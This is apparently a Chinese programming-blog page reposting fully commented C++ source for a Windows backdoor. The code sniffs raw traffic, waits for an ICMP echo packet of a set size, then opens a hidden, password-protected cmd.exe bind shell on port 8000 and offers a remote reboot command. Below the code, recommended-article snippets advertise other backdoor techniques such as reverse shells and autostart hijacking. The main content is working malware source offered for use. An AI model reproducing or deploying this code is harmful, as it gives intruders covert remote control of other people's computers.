简单后门 c++版 当年LION写 现详细注释

最新推荐文章于 2021-07-14 12:04:40 发布
最新推荐文章于 2021-07-14 12:04:40 发布
阅读量1.3k 收藏
点赞数
分类专栏: 病毒木马 文章标签: c++ buffer socket struct null attributes
//
//simple door
//二〇一零年 二月四号
//author: LION  
//路子注释
//广西桂林 EST
//
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <MSTCPIP.h>
//
#pragma  comment(lib,"wsock32")
//
#define  ICMP_ECHO 8           //ICMP 回显请求报文类型为8
#define  ICMP_ECHOREPLY 0      //ICMP 回显应答报文的类型值为0
#define  SNIFFER_ICMP_SIZE 101 //监听ICMP包的大小
#define  BIND_PORT  8000       //默认bind shell 端口
#define  MAX_PACKET 10000      //最大ICMP包的大小
#define  DEF_PASSWORD "shandongluzi"//默认密码
#define  xmalloc(s)   HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
//
//定义IP首部
//
typedef struct iphdr
{
//  类型          变量名称  解释                       字节数
        unsigned char h_verlen;//4位首部长度 4位IP版本号   1
        unsigned char tos;     //8位服务类型TOS            1
        unsigned short total_len;//16位总长度(字节)      2
        unsigned short ident;   //16位标识                 2
        unsigned short frag_and_flags;//3位标志位          2
        unsigned char  ttl;     //8位生存时间TTL           1
        unsigned char  proto;   //8位协议                  1
        unsigned short checksum;//16位IP首部校验和         2
        unsigned int   sourceIP;//32位IP地址               4
        unsigned int   destip;  //32位目的IP地址           4
}IPHeader;                  //IP首部长度为 20


//
//定义ICMP首部
//
typedef struct _ihdr
{
        unsigned char  i_type;//8位类型    1
        unsigned char  i_code;//8位代码    1
        unsigned short i_cksum;//16位校验和 2
        unsigned short i_id;//识别号(用进程号作为识别) 2
        unsigned short i_seq;//报文序列号  2

}ICMPHeader;//ICMP首部长度为 8

//
//函数定义
//
int  sniffer();//监听ICMP大小
//简单SNIFFER
void decode_sniffer(char *,int ,struct sockaddr_in *);
int  binshell();//绑定shell
DWORD dwBufferlen[10];  //缓冲区
DWORD dwBufferlnlen=1;  //缓冲长度
DWORD dwBytesReturned=0;//返回长度
HANDLE bindthread;      //句柄
//DOOR 主函数
//
int main()
{
        WSADATA wsaData;//定义数据
        int     retval;//返回值
        //SOCKET 初始化
        if ((retval=WSAStartup(MAKEWORD(2,2),&wsaData))!=0)
        {
     printf("WSASTARTUP failed:%d/n",retval);
         exit(-1);
        }
        //sniffer开始
        sniffer();
        //socker 结束
        WSACleanup();
        
        return 0;
}
//
//sniffer 函数
//
int sniffer()
{
int packsize=SNIFFER_ICMP_SIZE;//ICMP 包的大小
SOCKET sockersniffer;          //socket
struct sockaddr_in  fro; //原IP
struct sockaddr_in  des; //目的IP
struct hostent *hp; //本机IP  
int    sread; //读取
int    fromlen=sizeof(fro);//原IP长度
unsigned char LocalName[256];//本地名
char   *recvbuf;//接收数据
//
//创建一个原始socket,接受所有接受的包
if ((sockersniffer=WSASocket(AF_INET,SOCK_RAW,IPPROTO_IP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{

        printf("wsasocket error %d/n",WSAGetLastError());
        return -1;
}
//获取本地地址
gethostname((char*)LocalName,sizeof(LocalName)-1);
if((hp=gethostbyname((char*)LocalName))==NULL)
{
        return -1;
}
//
//初始化DES目的IP
memset(&des,0,sizeof(des));
memset(&des.sin_addr.S_un.S_addr,(int)hp->h_addr_list[0],hp->h_length);
//
//tcp嗅探选项
des.sin_family=AF_INET;
des.sin_port=htons(8000);
//
//socket bind
bind(sockersniffer,(PSOCKADDR)&des,sizeof(des));
//
//设置socket为接受所有包
WSAIoctl(sockersniffer,SIO_RCVALL,&dwBufferlnlen,sizeof(dwBufferlnlen),&dwBufferlen,sizeof(dwBufferlen),&dwBytesReturned,NULL,NULL);
//分配scoket接受缓冲区大小为MAX_PACKET
recvbuf=(char*)xmalloc(MAX_PACKET);
printf("sinffer ok/n");
while(1)
{
       //读数据
           sread=recvfrom(sockersniffer,recvbuf,MAX_PACKET,0,(struct sockaddr*)&fro,&fromlen);
           //
           //读取数据出错
           if(sread==SOCKET_ERROR || sread <0)
           {
                         //超时 继续
                if(WSAGetLastError()==WSAETIMEDOUT)
                                {
                 continue;
                                }
                                printf("recvfrom failed :%d/n",WSAGetLastError());
                                return -1;
           }
       else
                     if (sread >=28)
                         {//
                          //如果读到数据的大小==监听包的大小+28
                                 if(sread==packsize+28)
                                 {//将接受到的数据交给sniffer解释程序处理
                                         decode_sniffer(recvbuf,sread-28,&fro);
                                 }
                                 
                         }
                         return 1;
}
}
//
//简单的sniffer解包程序
void decode_sniffer(char *buf, int bytes, struct sockaddr_in * from)
{
        //ICMP包
        ICMPHeader *icmphdr;
        //icmp首部地址等于BUF+IP首部长度 buf+20
    icmphdr=(ICMPHeader *)(buf+sizeof(IPHeader));
        //简单判断如果为ICMP请求包
        if(icmphdr->i_type==ICMP_ECHO)
        {
                //bind shell
                binshell();
        }
        else
                printf("/r/nGEt others packets!");
        return;

}
//
//bind shell
int binshell()
{
        int bport=BIND_PORT;//绑定端口
    SOCKET binserver,getclient;//客户端 和服务器
        struct sockaddr_in addrserver,addrClient;//客户端和服务器
        //
        //定义各种字符
        char   Buffer[4096];
        char   *Message="/r luzi EST/r/n";
        char   *getpass="/r enter password";
        char   *passok="/r/nok! enter ";
        char   *nothispass="/r/n sorry password is wrong/n";
        char   *exitok="/r/nExit ok/n";
        char   *rebook="/r/n Reboot now!/r/n";
        //
    //创建一个socket
        binserver=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
        //服务器地址和端口制定
        addrserver.sin_family=AF_INET;
        addrserver.sin_port=htons(bport);
        addrserver.sin_addr.S_un.S_addr=ADDR_ANY;
        //设置超时
        int timeout=60000;
    setsockopt(binserver,SOL_SOCKET,SO_RCVTIMEO,(CHAR *)&timeout,sizeof(timeout));
        //设置重复利用端口
        UINT bRetUser=1;
        setsockopt(binserver,SOL_SOCKET,SO_REUSEADDR,(CHAR *)&bRetUser,sizeof(bRetUser));
        //监听端口
        bind(binserver,(struct sockaddr *)&addrserver,sizeof(addrserver));
        listen(binserver,2);
        printf("/r/n bind port on %d ok/n",bport);
        //接受客户端连接
        int ilen=sizeof(addrClient);
        //接受1次连接
        getclient=accept(binserver,(struct sockaddr *)&addrClient,&ilen);
        if(getclient!=INVALID_SOCKET)
        {
     //如果有连接进来设置延时为60S
                int itimeout=60000;
                setsockopt(getclient,SOL_SOCKET,SO_RCVTIMEO,(char *)&itimeout,sizeof(itimeout));
        }
        else
        {
                return -1;
        }
        //写欢迎信息
        send(getclient,Message,strlen(Message),0);
        //写密码验证信息
    send(getclient,getpass,strlen(getpass),0);
        //接受数据
        recv(getclient,Buffer,1024,0);
        //验证密码
        if(!(strstr(Buffer,DEF_PASSWORD)))
        {
     //如果密码错误,写密码错误信息
                send(getclient,nothispass,strlen(nothispass),0);
                printf("/r/n password not ghist");
                closesocket(getclient);
                closesocket(binserver);
                return -1;
        }
    //写通过验证信息
        send(getclient,passok,strlen(passok),0);
        //建立两个匿名管道
        HANDLE HReadpipe1,hWritePipe1,Headpipe2,Hwritepipe2;
        unsigned long lBytesRead;
        SECURITY_ATTRIBUTES sa;
        sa.nLength=12;
        sa.lpSecurityDescriptor=0;
        sa.bInheritHandle=TRUE;
        //创建PIPE
        CreatePipe(&HReadpipe1,&hWritePipe1,&sa,0);
        CreatePipe(&Headpipe2,&Hwritepipe2,&sa,0);
        STARTUPINFO siinfo;
        char cmdline[]="cmd.exe";
        //
        PROCESS_INFORMATION processinformation;
        ZeroMemory(&siinfo,sizeof(siinfo));
        siinfo.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        siinfo.wShowWindow=SW_HIDE;
        siinfo.hStdInput=Headpipe2;//读socket写入PIPE2的数据
        siinfo.hStdOutput=siinfo.hStdError=hWritePipe1;//写数据
        printf("/r/ncreata pipe ok/n");
        //
        //创建一个cmd进程 由HREADPIPE2读数据 向HWRTIEPIPE1 写数据
        int bread=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&siinfo,&processinformation);
        while (1)
        {
                //检查管道是否有数据返回
                int ret=PeekNamedPipe(HReadpipe1,Buffer,1024,&lBytesRead,0,0);
                if(lBytesRead)
                {
                        //从管道HREADPIPE1读数据
                        ret=ReadFile(HReadpipe1,Buffer,lBytesRead,&lBytesRead,0);
                        if(!ret) break;
                        //把管道HEADPIPE1读到的数据写如GETCILENT中
                        ret=send(getclient,Buffer,lBytesRead,0);
                        if(ret<=0) break;
                }
                else
                {

                        //如果连接getclient有接受到数据
                        lBytesRead=recv(getclient,Buffer,1024,0);
                    if (lBytesRead<=0) break;
                        //把从连接getclient读到的数据写入hwitre2
                        ret=WriteFile(Hwritepipe2,Buffer,lBytesRead,&lBytesRead,0);
                        if(lBytesRead>4 && Buffer[0]=='e' && Buffer[1]=='x' && Buffer[2]=='i' && Buffer[3]=='t')
                        {
                                //写退出信息
                                send(getclient,exitok,strlen(exitok),0);
                                closesocket(getclient);
                                closesocket(binserver);
                                return -1;
                        }
                        else
                        {

                                if(lBytesRead>6 && Buffer[0]=='r' && Buffer[1]=='e'&& Buffer[2]=='b'&& Buffer[3]=='o'&&Buffer[4]=='t')
                                {

                                        //写重启
                                        send(getclient,rebook,strlen(rebook),0);
                                        closesocket(getclient);
                                        closesocket(binserver);
                                        ExitWindowsEx(EWX_REBOOT,NULL);
                                        return 1;
                                }
                                 if(!ret) break;
                        }
                    

                }
         closesocket(getclient);
                 closesocket(binserver);
                 return 1;
        }

return 0;
}
clearver
关注
专栏目录
c++ cmdshell反弹型后门
07-01
反弹型后门 把自身注入到IE中 反向链接服务端 用NC 来监听就可以 大家可以发挥想象 把其他代码补全 (Rebound-type back door to reverse itself into the link into IE to listen with the NC server can imagine we can play the other code completion)
安全之路 —— C/C++后门的服务自启动
dengdao1372的博客
08-24 322
简介 Windows NT系统后门要实自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发C++代码样例 ////////////////////////////////////////////////////////////// // // Fil...
C++中的端口复用后门的编
桂林哈秋 - 我想学编程
03-29 1926
原文:http://hi.baidu.com/biweilun/blog/item/8c13b5197fb9514143a9adad.html端口复用后门很多人认为挺有难度的,要强行将Windows正在使用的开放端口占掉,然后插入我们的后门,一般人都以为必须在ring0下面进行,其实完全没有必要,下面给出一段我研究的代码,去除了几行关键的代码,防止居心不良的人直接拿去编译。加上了注释,将就着看
使用C++基于WEB CGI的后门漏洞
热门推荐
单核CPU的小朋友的博客
12-11 3万+
先上代码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; #include &amp;amp;lt;string&amp;amp;gt; using namespace std; int main() { printf(&amp;quot;Content-Type:text/plain;charset=utf-8\r\n\r\n&a
C语言,后门程序,C++映像劫持后门实例分析
weixin_30317869的博客
05-18 255
// freeheart.cpp : Defines the entry point for the console application.//学习交流使用,违法使用后果自负。// by:cnblogs.com/blogg time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i// argv 2 = name.exe// argv 3 = 1 ...
DelphiT-Cmd源码.rar_c++后门源码_cmd 源码_cmd编辑t_delphi cmd
09-22
T-CMD 是一款用 C++后门程序,网上已有 C++ 源码发布。 在本人学习 C++ 的时候,顺便把他翻译成了 Pascal 源码,突然感觉以前感到高深莫测的 C++ 也不那么可怕了。特贡献出来,给大家学习 C++ 和 Delphi 的...
C++映像劫持后门实例分析
09-03
C++映像劫持后门是一种利用操作系统的注册表功能,通过劫持正常的程序执行流程,将系统原本应当执行的程序替换为攻击者指定的恶意程序的技术。这种技术在早期主要用于绕过安全防护,使得恶意软件能够在没有用户察觉...
pangolin去后门修改.zip
最新发布
01-06
【标题】"pangolin去后门修改.zip" 暗示了这是一个关于"Pangolin"工具的特别本,经过了去除后门的安全处理。Pangolin,又称为鳞片浏览器,是一款知名的网络安全扫描工具,常用于进行网络安全评估和漏洞检测。"去...
快速开发NFine框架(去后门本)
01-30
- **学习简单**:NFine框架的学习曲线相对较平缓,文档齐全,易于上手。 - **功能强大**:集成了权限管理、工作流、报表、图表等常见企业应用功能,满足多样化需求。 - **轻量级**:不依赖大型第三方库,保持框架...
phpstudy(后门).7z
06-03
phpstudy后门,可用于后门测试
VC++打造后门.
11-07
VC++打造后门.由于文件太大分两部分上传,下载完后阅读
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
[转载]一个ping后门源代码以及代码注释
yxder的专栏
09-23 484
#include #include #include #include #include #define ICMP_ECHO 8 // ICMP回显请求报文的类型值为8 #define ICMP_ECHOREPLY 0 // ICMP回显应答报文的类型值为0 #define SNIFFER_ICMP_SIZE 101 // 监听ICMP包的大? #de
在OS X Lion 10.8.4 x86_64平台搭建C++11开发环境
delphiwcdj的专栏
08-12 9854
20130812 wcdj 1 下载 http://gcc.gnu.org/ http://gcc.gnu.org/gcc-4.8/ GCC 4.8.1 will be C++11 feature-complete [2013-04-01]Support for C++11 ref-qualifiers was added to the GCC 4.8 branc
Linux编程之给你的程序开后门
weixin_33938733的博客
01-14 114
这里说的“后门”并不是教你做坏事,而是让你做好事,搭建自己的调试工具更好地进行调试开发。我们都知道,当程序发生异常错误时,我们需要定位到错误,有时我们还想,我们在不修改程序的前提下,就能通过log来定位错误呢?有人会说,我在我的程序里加多点打印就好了,程序每做一步我就加一行打印,到时一查log就知道程序在哪一步死掉的了。这个方法在小程序里也许会行得通,但是,在一个大型系统,每秒的log达到几百条,...
程序后门制作
lovelan1748的专栏
03-08 956
两个项目,BackDoor是程序后门的核心代码,FormTest为测试类 上星期有人在C#论坛里发了程序后门的例程,但是制作方法封装在一个稍微有点麻烦的动态库里,今天把大致的制作方法提取出来重新了个自己的,供大家参考,欢迎大家批评指正。 源码下载
我今天终于知道后门在代码上是如何实
wjp_116的专栏
03-23 5489
我们开发的程序是要在生产一线使用的,这种软件不但要考虑功能,还要考虑到使用者的知识水平和个人素质。总有人喜欢不按规程操作,把这些问题交给管理者去规范是个很挠头的事情。这样只能在代码上进行处理了。比如不能在通信过程中退出程序,否则会造成通信数据的不完整性。而如果有时我们的程序有问题时又确实要在那种情况下退出,这样就需要在代码中增加一部分,只有点击了特定的按钮顺序才能退出程序。当然这部分代码是在我们技
c++ 利用winpcap编制简单的路由程序_腾讯QQ升级程序存在漏洞,被利用植入后门病毒...
weixin_35940165的博客
12-24 134
近日,火绒安全团队根据用户反馈,发一起利用腾讯QQ升级漏洞植入后门病毒的攻击事件,攻击者可利用该漏洞下发任意恶意代码。火绒团队称:截止到目前,最新QQ(包括TIM、QQ、QQ轻聊、QQ国际等等)都存在该漏洞。经分析,该事件中被利用的升级漏洞曾在2015年就被公开披露过,之后腾讯对该漏洞进行修复并增加了校验逻辑。但从目前来看,QQ此处升级逻辑仍存在逻辑漏洞。另外,在排除本地劫持的可能后(LS...
计算机病毒中的后门病毒,国家计算机病毒中心发恶意后门程序新变种
weixin_36259939的博客
07-14 576
新华网天津7月27日电(记者张建新、袁帅)国家计算机病毒应急处理中心通过对互联网的监测发,近期出一种恶意后门程序变种Backdoor_Androm.EWC。该变种运行后,会将其自身复制到受感染操作系统的系统目录下,并重新命名。该变种会提升自身权限,将恶意代码注入指定进程中,以达到隐藏自身的目的。与此同时,该变种创建注册表启动项,保存恶意代码,实自身开机启动。另外,该变种还会在受感染系统的后台...
C++基础通信:构建简单服务与协议处理
这篇文档详细介绍了在C++中通过各种通信手段(如C Shell、Socket、注册服务等)在Windows系统中进行简单通信的方法,并特别关注了兼容性、性能优化以及必要的系统依赖。对于C++开发者来说,这是理解和实跨平台通信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值